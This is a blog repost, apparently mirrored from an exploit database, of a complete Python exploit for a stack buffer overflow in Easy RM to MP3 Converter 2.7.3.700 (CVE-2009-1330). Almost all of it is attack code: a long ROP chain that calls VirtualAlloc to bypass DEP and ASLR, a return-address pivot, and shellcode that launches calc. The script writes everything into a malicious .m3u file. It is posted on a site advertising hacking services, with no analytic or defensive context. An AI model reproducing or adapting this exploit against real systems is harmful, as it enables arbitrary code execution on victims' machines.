Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86387714

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass
# Date: 2016-06-12
# Exploit Author: Csaba Fitzl
# Vendor Homepage: N/A
# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 x64
# CVE : CVE-2009-1330

import struct

def create_rop_chain():

	# rop chain generated with mona.py - www.corelan.be
	# added missing parts, and some optimisation by Csaba Fitzl
	rop_gadgets = [

	  #mov 1000 to EDX - Csaba
	  0x41414141,  # Filler (compensate)
	  0x41414141,  # Filler (compensate)
	  0x41414141,  # Filler (compensate)
	  0x10025a1c,  # XOR EDX,EDX # RETN 
	  0x1002bc3d,  # MOV EAX,411 # RETN
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc24,  # ADD EAX,80 # POP EBP # RETN
	  0x41414141,  # Filler (compensate)
	  0x1002dc41,  # ADD EAX,40 # POP EBP # RETN
	  0x41414141,  # Filler (compensate)
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x10023327,  # INC EAX # RETN
	  0x10023327,  # INC EAX # RETN
	  0x10023327,  # INC EAX # RETN
	  # AT this point EAX = 0x1000
	  0x1001a788,  # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] 
	  0x41414141,  # Filler (compensate)
	  0x41414141,  # Filler (compensate)
	  0x41414141,  # Filler (compensate)
	  0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI
	  0x41414141,  # Filler (compensate)
	  
	
	  0x10026d56,  # POP EAX # RETN [MSRMfilter03.dll] 
	  0x10032078,  # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll]
	  0x1002e0c8,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll]
	   
	  0x1001a788,  # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] 
	  0x41414141,  # Filler (compensate)
	  0x41414141,  # Filler (compensate)
	  0x41414141,  # Filler (compensate)
	  0x10027c5a,  # POP EBP # RETN [MSRMfilter03.dll] 
	  0x1001b058,  # & push esp # ret  [MSRMfilter03.dll]
	  0x1002b93e,  # POP EAX # RETN [MSRMfilter03.dll] 
	  0xfffffffb,  # put delta into eax (-> put 0x00000001 into ebx)
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x10023327,  # INC EAX # RETN
	  0x10023327,  # INC EAX # RETN
	  0x1001bdee,  # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll] 
	  0x41414141,  # Filler (compensate)
	  0x41414141,  # Filler (compensate)

	  0x10029f74,  # POP ECX # RETN [MSRMfilter03.dll] 
	  0xffffffff,  #  
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002bc6a,  # POP EDI # RETN [MSRMfilter03.dll] 
	  0x1001c121,  # RETN (ROP NOP) [MSRMfilter03.dll]
	  0x10026f2b,  # POP EAX # RETN [MSRMfilter03.dll] 
	  0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP
	  0x1002bc07  # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL 

	]
	return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

buffersize = 26090

junk = "A" * buffersize

eip = '\x85\x22\x01\x10' # {pivot 8 / 0x08} :  # ADD ESP,8 # RETN

rop = create_rop_chain()

calc = (
"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")
 

shell = "\x90"*0x10 + calc

exploit = junk + eip + rop + shell + 'C' * (1000-len(rop)-len(shell))

filename = "list.m3u"
textfile = open(filename , 'w')
textfile.write(exploit)
textfile.close()